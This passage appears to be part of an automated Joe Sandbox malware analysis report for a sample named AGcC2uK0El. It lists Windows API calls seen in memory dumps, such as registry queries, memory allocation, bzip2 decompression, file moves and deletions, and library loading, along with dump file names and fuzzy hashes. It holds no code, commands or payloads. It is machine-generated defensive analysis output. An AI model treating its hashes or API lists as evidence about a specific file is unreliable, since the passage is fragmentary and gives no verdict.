                                                                                    • GetACP.KERNEL32(?,?,00000001,00000000,0047CC8B,?,-0000001A,0047EBEA,-00000010,?,00000004,0000001A,00000000,0047EF37,?,0045D288), ref: 0047CA22
                                                                                      • Part of subcall function 0042E244: 73A0A570.USER32(00000000,00000000,0047EF9E,?,?,00000001,00000000,00000002,00000000,0047F8E7,?,?,?,?,?,0049719A), ref: 0042E253
                                                                                      • Part of subcall function 0042E244: EnumFontsA.GDI32(?,00000000,0042E230,00000000,00000000,0042E29C,?,00000000,00000000,0047EF9E,?,?,00000001,00000000,00000002,00000000), ref: 0042E27E
                                                                                      • Part of subcall function 0042E244: 73A0A480.USER32(00000000,?,0042E2A3,00000000,00000000,0042E29C,?,00000000,00000000,0047EF9E,?,?,00000001,00000000,00000002,00000000), ref: 0042E296
                                                                                    • SendNotifyMessageA.USER32(00010480,00000496,00002711,-00000001), ref: 0047CBF2
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: A480A570EnumFontsMessageNotifySend
                                                                                    • String ID:
                                                                                    • API String ID: 2685184028-0
                                                                                    • Opcode ID: f68c4743a9de9405453e6a0390fbdfcde8eff5ac8737c06096cd16648cf5d8d5
                                                                                    • Instruction ID: fce8b5d73ed99f1e2ef66d4a8ce886950ac346dadb3b378a3b6f7676f451f25a
                                                                                    • Opcode Fuzzy Hash: f68c4743a9de9405453e6a0390fbdfcde8eff5ac8737c06096cd16648cf5d8d5
                                                                                    • Instruction Fuzzy Hash: 585172346001048BC720EF26E9C668B3799EB54309B50C57FB8489B7A7C73CED468B9E
                                                                                    APIs
                                                                                    • RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,00000000,0042DC60), ref: 0042DB64
                                                                                    • RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,70000000,?,?,00000000,?,00000000,?,00000000,0042DC60), ref: 0042DBD4
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: QueryValue
                                                                                    • String ID:
                                                                                    • API String ID: 3660427363-0
                                                                                    • Opcode ID: f6dee5a1b0912d590274e0c641160928bd3a3525fab59aba2a017e3bac49ea5e
                                                                                    • Instruction ID: dfb8c8f379aef3e71039058fa16673b54f7d2a66c5b8750361213b9ce9dda202
                                                                                    • Opcode Fuzzy Hash: f6dee5a1b0912d590274e0c641160928bd3a3525fab59aba2a017e3bac49ea5e
                                                                                    • Instruction Fuzzy Hash: E6416371E04129AFDB11DF96D881BAFB7B8EB44704F91846AE800F7244D778EE00DB95
                                                                                    APIs
                                                                                    • RegEnumKeyExA.ADVAPI32(?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,0042DEFE,?,?,00000008,00000000,00000000,0042DF2B), ref: 0042DE94
                                                                                    • RegCloseKey.ADVAPI32(?,0042DF05,?,00000000,00000000,00000000,00000000,00000000,0042DEFE,?,?,00000008,00000000,00000000,0042DF2B), ref: 0042DEF8
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: CloseEnum
                                                                                    • String ID:
                                                                                    • API String ID: 2818636725-0
                                                                                    • Opcode ID: c20ec2cbd5f7473bb618f7593d98c9f52b2147fe6f3bae42fe9bdb37577d9e65
                                                                                    • Instruction ID: 371203d48d58dd12687a59eda9429109c9bfccb849147f5bab4b3e409d052118
                                                                                    • Opcode Fuzzy Hash: c20ec2cbd5f7473bb618f7593d98c9f52b2147fe6f3bae42fe9bdb37577d9e65
                                                                                    • Instruction Fuzzy Hash: F431D570F04648AEDB11DFA6DD42BBFBBB8EB49304F91407BE500B7280D6789E01CA19
                                                                                    APIs
                                                                                    • VirtualAlloc.KERNEL32(00000000,00600000,00002000,00000001,?,?), ref: 0045CF34
                                                                                    • BZ2_bzDecompressInit._ISDECMP(?,00000000,00000000,?,?,?,00000000,00600000,00002000,00000001,?,?), ref: 0045CF7A
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: AllocDecompressInitVirtualZ2_bz
                                                                                    • String ID:
                                                                                    • API String ID: 3582128297-0
                                                                                    • Opcode ID: 939ddee8e7cb809407a1460aba98dbeb0dddb04131a165e363d28bd3e230a3f5
                                                                                    • Instruction ID: 1a4503516ee109fc6ad3b2554e9268a8a2595667017840414d64b8ef7de05fed
                                                                                    • Opcode Fuzzy Hash: 939ddee8e7cb809407a1460aba98dbeb0dddb04131a165e363d28bd3e230a3f5
                                                                                    • Instruction Fuzzy Hash: D0110872600700BFD310CF258982B96BBA6FF44751F044127E908D7681E7B9A928CBD8
                                                                                    APIs
                                                                                    • FindResourceA.KERNEL32(00400000,00000000,0000000A), ref: 0040AFF2
                                                                                    • FreeResource.KERNEL32(00000000,00400000,00000000,0000000A,F0E80040,00000000,?,?,0040B14F,00000000,0040B167,?,?,?,00000000), ref: 0040B003
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: Resource$FindFree
                                                                                    • String ID:
                                                                                    • API String ID: 4097029671-0
                                                                                    • Opcode ID: c217acbb35f958402dd645ed5001c515fa2723f58848c5696583f56f37880200
                                                                                    • Instruction ID: 91321923317e208a88a5ae6d58faa7c91e6d3ee961cd2f37f7af0eb3e2dea987
                                                                                    • Opcode Fuzzy Hash: c217acbb35f958402dd645ed5001c515fa2723f58848c5696583f56f37880200
                                                                                    • Instruction Fuzzy Hash: A401DFB1300604AFD710FF69DC92E5B77A9DB8A7187118076F500AB6D0DA7AAC1096AD
                                                                                    APIs
                                                                                    • MoveFileA.KERNEL32(00000000,00000000), ref: 00452322
                                                                                    • GetLastError.KERNEL32(00000000,00000000,00000000,00452348), ref: 0045232A
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorFileLastMove
                                                                                    • String ID:
                                                                                    • API String ID: 55378915-0
                                                                                    • Opcode ID: 835ec9a5b672ab9d24676a9d11d134ae0c37e22a40a15be47d608805de694f62
                                                                                    • Instruction ID: cd5642aef6cf07d7f8e9267465b44b1c19008dc4a29441b527747bf004e73304
                                                                                    • Opcode Fuzzy Hash: 835ec9a5b672ab9d24676a9d11d134ae0c37e22a40a15be47d608805de694f62
                                                                                    • Instruction Fuzzy Hash: 0301F971B04744BBCB00DFB99D415AEB7ECDB4932575045BBFC08E3252EA7C5E088598
                                                                                    APIs
                                                                                    • CreateDirectoryA.KERNEL32(00000000,00000000,00000000,00451E2F), ref: 00451E09
                                                                                    • GetLastError.KERNEL32(00000000,00000000,00000000,00451E2F), ref: 00451E11
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateDirectoryErrorLast
                                                                                    • String ID:
                                                                                    • API String ID: 1375471231-0
                                                                                    • Opcode ID: b7dd327be7f8f9d4ff98a7d49d2b4008869c573d79d3003604c7202f4093979a
                                                                                    • Instruction ID: 865e03444c10a102779f68a5f284ef85491b61924e311ce2fbbb44c68c5af0ec
                                                                                    • Opcode Fuzzy Hash: b7dd327be7f8f9d4ff98a7d49d2b4008869c573d79d3003604c7202f4093979a
                                                                                    • Instruction Fuzzy Hash: 03F0C871A04604ABCB10DF759C4269EB7E8DB49315B5049B7FC04E7652E63D5E088598
                                                                                    APIs
                                                                                    • DeleteFileA.KERNEL32(00000000,00000000,00451FC5,?,-00000001,?), ref: 00451F9F
                                                                                    • GetLastError.KERNEL32(00000000,00000000,00451FC5,?,-00000001,?), ref: 00451FA7
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: DeleteErrorFileLast
                                                                                    • String ID:
                                                                                    • API String ID: 2018770650-0
                                                                                    • Opcode ID: 3d1044f5e2d2d648e0667ff4a971c8bbcfba219cc637320a536d75e9382e69c7
                                                                                    • Instruction ID: 56c29436b3704a60aac7ef2d45938277689dd37fb147f6dcc6f0601c7006ef02
                                                                                    • Opcode Fuzzy Hash: 3d1044f5e2d2d648e0667ff4a971c8bbcfba219cc637320a536d75e9382e69c7
                                                                                    • Instruction Fuzzy Hash: 59F0C872A04644ABCB00DF75AC416AEB7E8DB4831575149B7FC04E3262E7385E189598
                                                                                    APIs
                                                                                    • GetFileAttributesA.KERNEL32(00000000,00000000,0045219F,?,?,00000000), ref: 00452179
                                                                                    • GetLastError.KERNEL32(00000000,00000000,0045219F,?,?,00000000), ref: 00452181
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: AttributesErrorFileLast
                                                                                    • String ID:
                                                                                    • API String ID: 1799206407-0
                                                                                    • Opcode ID: 6d4dbdae4b422f7f8bb4bc8d57743dba2f11a1c7441bfab1e9d389b7cfb9d745
                                                                                    • Instruction ID: 62be775e20b856c612f09eeab74c149225b5b58071cf0ad503393caa7686f059
                                                                                    • Opcode Fuzzy Hash: 6d4dbdae4b422f7f8bb4bc8d57743dba2f11a1c7441bfab1e9d389b7cfb9d745
                                                                                    • Instruction Fuzzy Hash: 2BF02870A04B08ABDB10DF759C414AEB3E8EB4572571047B7FC14A3282D7785E088588
                                                                                    APIs
                                                                                    • VirtualAlloc.KERNEL32(?,?,00001000,00000004,?,?,0045CEF2), ref: 0045D046
                                                                                    Strings
                                                                                    • bzlib: Too much memory requested, xrefs: 0045D021
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: AllocVirtual
                                                                                    • String ID: bzlib: Too much memory requested
                                                                                    • API String ID: 4275171209-1500031545
                                                                                    • Opcode ID: c63733ee34ed6dcfa19a3ccb32caffce73538764a075bf8867a72a68987aa30e
                                                                                    • Instruction ID: abed268314e6f1e5b27342288b91a972118d83a3dc427804377a042ebfa3a805
                                                                                    • Opcode Fuzzy Hash: c63733ee34ed6dcfa19a3ccb32caffce73538764a075bf8867a72a68987aa30e
                                                                                    • Instruction Fuzzy Hash: 87F030327001114BDB6199A988C17DA66D48F8875EF080476AF4CDF28BD6BDDC89C36C
                                                                                    APIs
                                                                                    • LoadCursorA.USER32(00000000,00007F00), ref: 00423259
                                                                                    • LoadCursorA.USER32(00000000,00000000), ref: 00423283
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: CursorLoad
                                                                                    • String ID:
                                                                                    • API String ID: 3238433803-0
                                                                                    • Opcode ID: f8ffac14a906f8b64a7fc8a6c8ab7a97eb5bbf96c971544edaeb3bf4604a13a0
                                                                                    • Instruction ID: 4bac6b1dd1e4bc4155aef89283820d70f6b19f6d084946fd63ee35bdac132fa3
                                                                                    • Opcode Fuzzy Hash: f8ffac14a906f8b64a7fc8a6c8ab7a97eb5bbf96c971544edaeb3bf4604a13a0
                                                                                    • Instruction Fuzzy Hash: 0BF05C11700110ABDA105D3E6CC0E2A7268DB82B36B6103BBFE3AD32D1CA2E1D01017D
                                                                                    APIs
                                                                                    • SetErrorMode.KERNEL32(00008000), ref: 0042E2C6
                                                                                    • LoadLibraryA.KERNEL32(00000000,00000000,0042E310,?,00000000,0042E32E,?,00008000), ref: 0042E2F5
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorLibraryLoadMode
                                                                                    • String ID:
                                                                                    • API String ID: 2987862817-0
                                                                                    • Opcode ID: 99dd2043f999db4e1414a2a3c1f7d5ac1e6fec7ec7d1cd9244d10c1b93de06db
                                                                                    • Instruction ID: 1f7e49cd896e1bdba9cb1c47732ae581670473b421036b970d27c02fb23a5fd1
                                                                                    • Opcode Fuzzy Hash: 99dd2043f999db4e1414a2a3c1f7d5ac1e6fec7ec7d1cd9244d10c1b93de06db
                                                                                    • Instruction Fuzzy Hash: ACF05E70614744BEDB029F679C6282ABAECE74DB1179248BAF800A7691E63D58108928
                                                                                    APIs
                                                                                    • GetClassInfoA.USER32(00400000,?,?), ref: 004162F1
                                                                                    • GetClassInfoA.USER32(00000000,?,?), ref: 00416301
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: ClassInfo
                                                                                    • String ID:
                                                                                    • API String ID: 3534257612-0
                                                                                    • Opcode ID: 95fcc31a687e8085c8d51d7c5e8386a7ebbc1e12afa0a833ee919d12e52ce4aa
                                                                                    • Instruction ID: 0adfc10981bdfd058f0d6bb489ac923dd3d4ff6eaebe16c9951958678d3e783c
                                                                                    • Opcode Fuzzy Hash: 95fcc31a687e8085c8d51d7c5e8386a7ebbc1e12afa0a833ee919d12e52ce4aa
                                                                                    • Instruction Fuzzy Hash: 50E01AB26025256AEB10DFA98D81EE32ADCDB09310B120263BE04CA286D764DD009BA8
                                                                                    APIs
                                                                                    • SetFilePointer.KERNEL32(?,00000000,?,00000002,?,?,0046F12D,0000003C,00000000), ref: 0044FF6E
                                                                                    • GetLastError.KERNEL32(?,00000000,?,00000002,?,?,0046F12D,0000003C,00000000), ref: 0044FF76
                                                                                      • Part of subcall function 0044FD14: GetLastError.KERNEL32(0044FB30,0044FDD6,?,00000000,?,004962F0,00000001,00000000,00000002,00000000,00496451,?,?,00000005,00000000,00496485), ref: 0044FD17
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorLast$FilePointer
                                                                                    • String ID:
                                                                                    • API String ID: 1156039329-0
                                                                                    • Opcode ID: e054c5ccee6c1196755840a7a8baca4f528d5ae0d9a30f87e7f7972c64a6d300
                                                                                    • Instruction ID: 1dbdaa83cb3dbbf4f1378df278a55a8d47ec78cb15146b3f417e0b56a3c3e3df
                                                                                    • Opcode Fuzzy Hash: e054c5ccee6c1196755840a7a8baca4f528d5ae0d9a30f87e7f7972c64a6d300
                                                                                    • Instruction Fuzzy Hash: E2E012B13056015BFB00EAA599C1F3B22D8DB49314F10487BB544CF182E674CC098B65
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: Global$AllocLock
                                                                                    • String ID:
                                                                                    • API String ID: 15508794-0
                                                                                    • Opcode ID: 3aab631d28e9500c64151c0aeb9b91af43aad549cba5a5fa87d1f146672bdb4f
                                                                                    • Instruction ID: 0263706b80ae8aebac4b2aeda69df254121a1764ed820e2db5cbcbfbef09bb73
                                                                                    • Opcode Fuzzy Hash: 3aab631d28e9500c64151c0aeb9b91af43aad549cba5a5fa87d1f146672bdb4f
                                                                                    • Instruction Fuzzy Hash: 3D9002C4C10B01A4DC0432B24C0BC3F0C2CD8C072C3C0486F7018B6183883C8800083C
                                                                                    APIs
                                                                                    • VirtualAlloc.KERNEL32(00000000,?,00002000,00000001,?,?,?,004017ED), ref: 00401513
                                                                                    • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,?,00002000,00000001,?,?,?,004017ED), ref: 0040153A
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: Virtual$AllocFree
                                                                                    • String ID:
                                                                                    • API String ID: 2087232378-0
                                                                                    • Opcode ID: 86d3033056ee1eeb69ed56595d455cb9815cc57517e3e671329daeadf9e1ec36
                                                                                    • Instruction ID: b33c25bc9d44e5855224c25112d8485d4e2e4d0ac397fdc44bd3a0d1e7be2c31
                                                                                    • Opcode Fuzzy Hash: 86d3033056ee1eeb69ed56595d455cb9815cc57517e3e671329daeadf9e1ec36
                                                                                    • Instruction Fuzzy Hash: 3BF08272A0063067EB60596A4C85B5359C49BC5794F154076FD09FF3E9D6B98C0142A9
                                                                                    APIs
                                                                                    • GetSystemDefaultLCID.KERNEL32(00000000,0040871A), ref: 00408603
                                                                                      • Part of subcall function 00406DF4: LoadStringA.USER32(00400000,0000FF87,?,00000400), ref: 00406E11
                                                                                      • Part of subcall function 00408570: GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0049A4C0,00000001,?,0040863B,?,00000000,0040871A), ref: 0040858E
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: DefaultInfoLoadLocaleStringSystem
                                                                                    • String ID:
                                                                                    • API String ID: 1658689577-0
